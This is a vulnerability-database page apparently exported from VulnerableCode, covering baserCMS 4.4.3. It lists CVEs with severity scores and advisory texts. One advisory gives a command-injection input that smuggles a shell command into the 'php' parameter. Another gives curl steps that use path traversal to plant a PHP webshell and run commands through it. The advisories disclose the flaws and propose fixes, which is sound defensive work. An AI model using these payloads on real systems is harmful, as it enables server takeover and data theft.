Django REST framework

Package Instance

Lookup for vulnerable packages by Package URL.

Purlpkg:composer/baserproject/basercms@4.4.3
Typecomposer
Namespacebaserproject
Namebasercms
Version4.4.3
Qualifiers
Subpath
Is_vulnerabletrue
Next_non_vulnerable_version5.2.3
Latest_non_vulnerable_version5.2.3
Affected_by_vulnerabilities
0
url VCID-1q79-sxzp-zker
vulnerability_id VCID-1q79-sxzp-zker
summary 
OS Command Injection
baserCMS allows a remote attacker with an administrative privilege to execute arbitrary OS commands via unspecified vectors.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-20682
reference_id
reference_type
scores
0
value 0.02357
scoring_system epss
scoring_elements 0.8521
published_at 2026-06-04T12:55:00Z
1
value 0.02357
scoring_system epss
scoring_elements 0.85235
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-20682
1
reference_url https://basercms.net/security/JVN64869876
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN64869876
2
reference_url https://jvn.jp/en/jp/JVN64869876/index.html
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://jvn.jp/en/jp/JVN64869876/index.html
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-20682
reference_id CVE-2021-20682
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-20682
fixed_packages
0
url pkg:composer/baserproject/basercms@4.4.5
purl pkg:composer/baserproject/basercms@4.4.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-5ay3-1t5g-vycu
3
vulnerability VCID-7x3n-4c2b-nfbx
4
vulnerability VCID-891u-x525-ykbb
5
vulnerability VCID-8buz-nsr9-3yge
6
vulnerability VCID-8ssu-umet-37bk
7
vulnerability VCID-ays7-6wvh-augt
8
vulnerability VCID-d1sf-cmct-zbh1
9
vulnerability VCID-g56w-z9cx-5ygv
10
vulnerability VCID-ggv8-3v9t-mfea
11
vulnerability VCID-hpk4-a6tr-3ffe
12
vulnerability VCID-j37y-gws9-ake9
13
vulnerability VCID-jby7-s5ez-dqb3
14
vulnerability VCID-k575-suuf-7bhf
15
vulnerability VCID-k5qv-4yp3-zbgf
16
vulnerability VCID-khft-xvrw-g3dr
17
vulnerability VCID-kmpp-6j49-pqfz
18
vulnerability VCID-mfm9-gsh3-ubg8
19
vulnerability VCID-nxrf-64er-xbfx
20
vulnerability VCID-p695-t9ye-v3ga
21
vulnerability VCID-pd8c-9d7z-zkhg
22
vulnerability VCID-sqr4-v889-tff8
23
vulnerability VCID-u16w-rbuk-ybfs
24
vulnerability VCID-uedz-j2vn-cbea
25
vulnerability VCID-y2sz-c6vb-pkdp
26
vulnerability VCID-zqd4-rdem-jfgk
27
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.4.5
aliases CVE-2021-20682, GHSA-g39q-f4rm-85x4
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-1q79-sxzp-zker
1
url VCID-3new-f12y-8bf9
vulnerability_id VCID-3new-f12y-8bf9
summary 
baserCMS has Unsafe File Upload Leading to Remote Code Execution (RCE)
### Details
The application's restore function allows users to upload a `.zip` file, which is then automatically extracted. A PHP file inside the archive is included using `require_once` without validating or restricting the filename. An attacker can craft a malicious PHP file within the zip and achieve arbitrary code execution when it is included.

Vector: Malicious ZIP upload + insecure `require_once`

### PoC
1. Restore backup
   ![image](https://github.com/user-attachments/assets/9e59768a-4a8e-472d-aaef-5d54546080f6)
1. Load file shell (insecure `require_once`)
   ![image](https://github.com/user-attachments/assets/8f7919a2-c7f3-4ae1-af6c-1b0057e4ba22)
   ![image](https://github.com/user-attachments/assets/c10ef049-459d-429e-a608-8fb220c3387f)

### Impact
Remote Code Execution (RCE)
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-32957
reference_id
reference_type
scores
0
value 0.00031
scoring_system epss
scoring_elements 0.09459
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-32957
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-hv78-cwp4-8r7r
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-hv78-cwp4-8r7r
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-32957
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-32957
6
reference_url https://github.com/advisories/GHSA-hv78-cwp4-8r7r
reference_id GHSA-hv78-cwp4-8r7r
reference_type
scores
url https://github.com/advisories/GHSA-hv78-cwp4-8r7r
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2025-32957, GHSA-hv78-cwp4-8r7r
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-3new-f12y-8bf9
2
url VCID-4zw8-truk-pugf
vulnerability_id VCID-4zw8-truk-pugf
summary 
baserCMS has OS Command Injection Leading to Remote Code Execution (RCE)
## Summary

In the core update functionality of baserCMS, some parameters sent from the admin panel are passed to the `exec()` function without proper validation or escaping. This issue allows **an authenticated CMS administrator to execute arbitrary OS commands on the server (Remote Code Execution, RCE)**.

This vulnerability is not a UI-level issue such as screen manipulation or lack of CSRF protection, but rather stems from **a design that directly executes input values received on the server side as OS commands**. Therefore, even if buttons are hidden in the UI, or even if CakePHP's CSRF/FormProtection (SecurityComponent) ensures that only legitimate POST requests are accepted, **an attack is possible as long as a request containing a valid token is processed within an administrator session**.

---

## Vulnerability Information

| Item | Details |
| ---- | ------- |
| CWE | CWE-78: Improper Neutralization of Special Elements used in an OS Command |
| Impact | Remote Code Execution (RCE) |
| Severity | Critical |
| Attack Requirements | Administrator privileges required |
| Reproducibility | Reproducible (confirmed multiple times) |
| Test Environment | baserCMS 5.2.2 (Docker / development environment) |

---

## Affected Areas

- **Controller**
  - `PluginsController::get_core_update()`
- **Service**
  - `PluginsService::getCoreUpdate()`
- **Affected Endpoint**
  - `/baser/admin/baser-core/plugins/get_core_update`

---

## Technical Details

### Vulnerable Code Flow

```text
PluginsController::get_core_update()
  ↓ Retrieves php parameter from POST data
PluginsService::getCoreUpdate($targetVersion, $php, $force)
  ↓ Concatenates $php into command string without validation or escaping
exec($command)
```

### Relevant Code (Excerpt)

**PluginsController.php**

```php
$service->getCoreUpdate(
    $request->getData('targetVersion') ?? '',
    $request->getData('php') ?? 'php',
    $request->getData('force'),
);
```

**PluginsService.php**

```php
$command = $php . ' ' . ROOT . DS . 'bin' . DS . 'cake.php composer ' .
           $targetVersion . ' --php ' . $php . ' --dir ' . TMP . 'update';

exec($command, $out, $code);
```

The `$php` parameter is user input, and **none** of the following countermeasures are in place:

- Restriction via allowlist
- Validation via regular expression
- Escaping via `escapeshellarg()` or similar

---

## Attack Scenario

1. The attacker logs in as a CMS administrator
2. Sends a POST request to the core update functionality in the admin panel
3. Specifies a string containing OS commands in the `php` parameter
4. `exec()` is executed on the server side, running the arbitrary OS command

### Example Attack Input (Conceptual)

```text
php=php;id>/tmp/rce_test;#
```

---

## Verification Results (PoC)

### Execution Result

```bash
$ docker exec bc-php cat /tmp/rce_test
uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)
```

The above confirms that OS commands can be executed with `www-data` privileges.

### Additional Notes

- Reproducible through the legitimate flow in the admin panel (browser)
- Succeeds even with CSRF/FormProtection tokens included in a legitimate request
- Failure cases (400/403) have also been investigated and differentiated
- Confirmed reproducible via resending HTTP requests with tools such as curl (resending the same request containing valid tokens)

---

## Impact

If this vulnerability is exploited, the following becomes possible:

- Retrieval of server information
- Reading/writing arbitrary files
- Retrieval of application configuration information (DB credentials, etc.)
- OS-level operations beyond application permission boundaries

Although administrator privileges are required, **this is a design issue where the impact extends from the application layer to the OS layer**, and the impact is considered significant.

---

## Recommended Fix

### Primary Recommendation

- Do not accept the PHP executable path from user input
- Fix the PHP executable on the server side using the `PHP_BINARY` constant

```php
$php = escapeshellarg(PHP_BINARY);
```

### Supplementary Fix Recommendations

- Apply `escapeshellarg()` escaping to other command-line arguments (version number, directory, etc.) as well
- If possible, consider using execution methods that do not involve shell interpretation (array format, Process class, etc.)

### Alternative (Not Recommended)

- Allowlist validation for the PHP executable path
- Combined use of regex validation and `escapeshellarg()`

However, **from the perspective of reducing the attack surface, a design that eliminates user input entirely is recommended**.

---

## Additional Notes

- This issue is independent of UI display controls (showing/hiding buttons)
- As long as the endpoint exists, an attack is possible if a request containing valid tokens is processed
- This is a problem stemming from the design-level handling of input, and cannot be prevented by CSRF or UI controls alone

---

## Conclusion

Due to a design issue in baserCMS's core update functionality where user input is passed to `exec()` without validation, **Remote Code Execution (RCE) is achievable with administrator privileges**. This vulnerability can be fixed through input validation and design review, and prompt remediation is recommended.

This advisory was translated from Japanese to English using GitHub Copilot.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-21861
reference_id
reference_type
scores
0
value 0.00131
scoring_system epss
scoring_elements 0.32198
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-21861
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-qxmc-6f24-g86g
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-qxmc-6f24-g86g
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-21861
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-21861
6
reference_url https://github.com/advisories/GHSA-qxmc-6f24-g86g
reference_id GHSA-qxmc-6f24-g86g
reference_type
scores
url https://github.com/advisories/GHSA-qxmc-6f24-g86g
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-21861, GHSA-qxmc-6f24-g86g
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4zw8-truk-pugf
3
url VCID-5ay3-1t5g-vycu
vulnerability_id VCID-5ay3-1t5g-vycu
summary 
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
BaserCMS is an open source content management system with a focus on Japanese language support. Users with upload privilege may upload crafted zip files capable of path traversal on the host operating system. This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-41279
reference_id
reference_type
scores
0
value 0.00438
scoring_system epss
scoring_elements 0.6349
published_at 2026-06-05T12:55:00Z
1
value 0.00438
scoring_system epss
scoring_elements 0.63447
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-41279
1
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
2
reference_url https://github.com/baserproject/basercms/commit/d8ab0a81a7bce35cc95ff7dff851a7e87a084336
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/commit/d8ab0a81a7bce35cc95ff7dff851a7e87a084336
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-41279
reference_id CVE-2021-41279
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-41279
4
reference_url https://github.com/advisories/GHSA-4x2f-54wr-4hjg
reference_id GHSA-4x2f-54wr-4hjg
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-4x2f-54wr-4hjg
5
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-4x2f-54wr-4hjg
reference_id GHSA-4x2f-54wr-4hjg
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/security/advisories/GHSA-4x2f-54wr-4hjg
fixed_packages
0
url pkg:composer/baserproject/basercms@4.5.4
purl pkg:composer/baserproject/basercms@4.5.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-ays7-6wvh-augt
6
vulnerability VCID-d1sf-cmct-zbh1
7
vulnerability VCID-g56w-z9cx-5ygv
8
vulnerability VCID-ggv8-3v9t-mfea
9
vulnerability VCID-j37y-gws9-ake9
10
vulnerability VCID-jby7-s5ez-dqb3
11
vulnerability VCID-k575-suuf-7bhf
12
vulnerability VCID-k5qv-4yp3-zbgf
13
vulnerability VCID-khft-xvrw-g3dr
14
vulnerability VCID-kmpp-6j49-pqfz
15
vulnerability VCID-mfm9-gsh3-ubg8
16
vulnerability VCID-nxrf-64er-xbfx
17
vulnerability VCID-p695-t9ye-v3ga
18
vulnerability VCID-pd8c-9d7z-zkhg
19
vulnerability VCID-sqr4-v889-tff8
20
vulnerability VCID-u16w-rbuk-ybfs
21
vulnerability VCID-uedz-j2vn-cbea
22
vulnerability VCID-y2sz-c6vb-pkdp
23
vulnerability VCID-zqd4-rdem-jfgk
24
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.5.4
aliases CVE-2021-41279, GHSA-4x2f-54wr-4hjg
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-5ay3-1t5g-vycu
4
url VCID-7x3n-4c2b-nfbx
vulnerability_id VCID-7x3n-4c2b-nfbx
summary 
baserCMS has OS command injection vulnerability in installer
baserCMS has an OS command injection vulnerability in the installer.

### Target
baserCMS 5.2.2 and earlier versions

### Vulnerability

If baserCMS is placed on a server but not installed, malicious commands may be executed.

### Countermeasures
Update to the latest version of baserCMS

Please refer to the following page to reference for more information.
https://basercms.net/security/JVN_54513170

### Credits

REN XINGDIAN
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30880
reference_id
reference_type
scores
0
value 0.00055
scoring_system epss
scoring_elements 0.17526
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30880
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-6hpg-8rx3-cwgv
reference_id
reference_type
scores
0
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-6hpg-8rx3-cwgv
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30880
reference_id
reference_type
scores
0
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30880
6
reference_url https://github.com/advisories/GHSA-6hpg-8rx3-cwgv
reference_id GHSA-6hpg-8rx3-cwgv
reference_type
scores
url https://github.com/advisories/GHSA-6hpg-8rx3-cwgv
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-30880, GHSA-6hpg-8rx3-cwgv
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-7x3n-4c2b-nfbx
5
url VCID-891u-x525-ykbb
vulnerability_id VCID-891u-x525-ykbb
summary 
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
There is a Potential Zip Slip Vulnerability and OS Command Injection Vulnerability on the management system of baserCMS. Users with permissions to upload files may upload crafted zip files which may execute arbitrary commands on the host operating system. This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users. If you are eligible, please update to the new version as soon as possible.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-41243
reference_id
reference_type
scores
0
value 0.02799
scoring_system epss
scoring_elements 0.86405
published_at 2026-06-05T12:55:00Z
1
value 0.02799
scoring_system epss
scoring_elements 0.86382
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-41243
1
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
2
reference_url https://github.com/baserproject/basercms/commit/9088b99c329d1faff3a2f1269f37b9a9d8d5f6ff
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/commit/9088b99c329d1faff3a2f1269f37b9a9d8d5f6ff
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-41243
reference_id CVE-2021-41243
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-41243
4
reference_url https://github.com/advisories/GHSA-7rpc-9m88-cf9w
reference_id GHSA-7rpc-9m88-cf9w
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-7rpc-9m88-cf9w
5
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-7rpc-9m88-cf9w
reference_id GHSA-7rpc-9m88-cf9w
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
1
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/security/advisories/GHSA-7rpc-9m88-cf9w
fixed_packages
0
url pkg:composer/baserproject/basercms@4.5.4
purl pkg:composer/baserproject/basercms@4.5.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-ays7-6wvh-augt
6
vulnerability VCID-d1sf-cmct-zbh1
7
vulnerability VCID-g56w-z9cx-5ygv
8
vulnerability VCID-ggv8-3v9t-mfea
9
vulnerability VCID-j37y-gws9-ake9
10
vulnerability VCID-jby7-s5ez-dqb3
11
vulnerability VCID-k575-suuf-7bhf
12
vulnerability VCID-k5qv-4yp3-zbgf
13
vulnerability VCID-khft-xvrw-g3dr
14
vulnerability VCID-kmpp-6j49-pqfz
15
vulnerability VCID-mfm9-gsh3-ubg8
16
vulnerability VCID-nxrf-64er-xbfx
17
vulnerability VCID-p695-t9ye-v3ga
18
vulnerability VCID-pd8c-9d7z-zkhg
19
vulnerability VCID-sqr4-v889-tff8
20
vulnerability VCID-u16w-rbuk-ybfs
21
vulnerability VCID-uedz-j2vn-cbea
22
vulnerability VCID-y2sz-c6vb-pkdp
23
vulnerability VCID-zqd4-rdem-jfgk
24
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.5.4
aliases CVE-2021-41243, GHSA-7rpc-9m88-cf9w
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-891u-x525-ykbb
6
url VCID-8buz-nsr9-3yge
vulnerability_id VCID-8buz-nsr9-3yge
summary 
baserCMS Path Traversal Leads to Arbitrary File Write and RCE via Theme File API
## Summary

A path traversal vulnerability exists in the baserCMS 5.x theme file management API (`/baser/api/admin/bc-theme-file/theme_files/add.json`) that allows arbitrary file write.

An authenticated administrator can include `../` sequences in the `path` parameter to create a PHP file in an arbitrary directory outside the theme directory, which may result in remote code execution (RCE).

## Affected Code

**File**: `plugins/bc-theme-file/src/Service/BcThemeFileService.php`

```php
public function getFullpath(string $theme, string $plugin, string $type, string $path)
{
    // ...
    return $viewPath . $type . DS . $path;  // $path is not sanitized
}
```

## Attack Scenario

1. The attacker compromises an administrator account (password leak, brute force, etc.)
2. Obtains an access token via API login
3. Specifies `path: "../../../../webroot/"` in the theme file creation API
4. A PHP file is created in the webroot
5. The attacker accesses the created PHP file to achieve RCE

## Reproduction Steps

```bash
# 1. Login
curl -X POST "http://target/baser/api/admin/baser-core/users/login.json" \
  -H "Content-Type: application/json" \
  -d '{"email":"admin@example.com","password":"password"}'

# 2. Create webshell
curl -X POST "http://target/baser/api/admin/bc-theme-file/theme_files/add.json" \
  -H "Authorization: Bearer <token>" \
  -H "Content-Type: application/json" \
  -d '{
    "theme": "BcThemeSample",
    "plugin": "",
    "type": "layout",
    "path": "../../../../webroot/",
    "base_name": "shell",
    "ext": "php",
    "contents": "<?php system($_GET[\"cmd\"]); ?>"
  }'

# 3. RCE
curl "http://target/shell.php?cmd=id"
```

## Vulnerability Details

| Item | Details |
|------|---------|
| CWE | CWE-22: Path Traversal, CWE-73: External Control of File Name or Path |
| Impact | Arbitrary file write, Remote Code Execution (RCE) |
| Attack Prerequisites | Administrator privileges + API enabled (`USE_CORE_ADMIN_API=true`), or chaining with XSS, etc. |
| Reproducibility | High (PoC verified) |
| Test Environment | baserCMS 5.x (Docker environment) |

### Additional Notes on Attack Prerequisites

- **When API is enabled** (`USE_CORE_ADMIN_API=true`): API calls can be made externally using JWT token authentication. Direct exploitation is possible.
- **Default settings** (`USE_CORE_ADMIN_API=false`): Direct external API calls are prohibited. CSRF protection is also active, so this vulnerability alone cannot be exploited. An exploit chain involving XSS or similar is required.

## Recommended Fix

Rather than relying on simple string replacement or blacklist checks of input, the canonicalized path (using `realpath()`, etc.) should be verified to be within the theme base directory after file creation or immediately before writing. If the path falls outside the boundary, the operation should be rejected.

The specific implementation location and method are left to the project's design decisions.

## Comparison with Other CMS

WordPress's theme editor only allows editing within `wp-content/themes/` and does not permit writes outside that directory. [CVE-2019-8943](https://www.sonarsource.com/blog/wordpress-image-remote-code-execution/) was reported as a path traversal vulnerability in `wp_crop_image()` that allowed writing cropped image output to an arbitrary directory by including `../` in the filename.

This vulnerability is not a matter of "administrators being able to execute arbitrary code" by design, but rather stems from a security boundary violation where "the theme editing function can write outside the theme directory (to webroot, config, etc.)."

## Resources

- OWASP Path Traversal: <https://owasp.org/www-community/attacks/Path_Traversal>
- WordPress RCE via Path Traversal (CVE-2019-8943): <https://www.sonarsource.com/blog/wordpress-image-remote-code-execution/>
- Jira Path Traversal (CVE-2025-22167): <https://nvd.nist.gov/vuln/detail/CVE-2025-22167>

This advisory was translated from Japanese to English using GitHub Copilot.
references
0
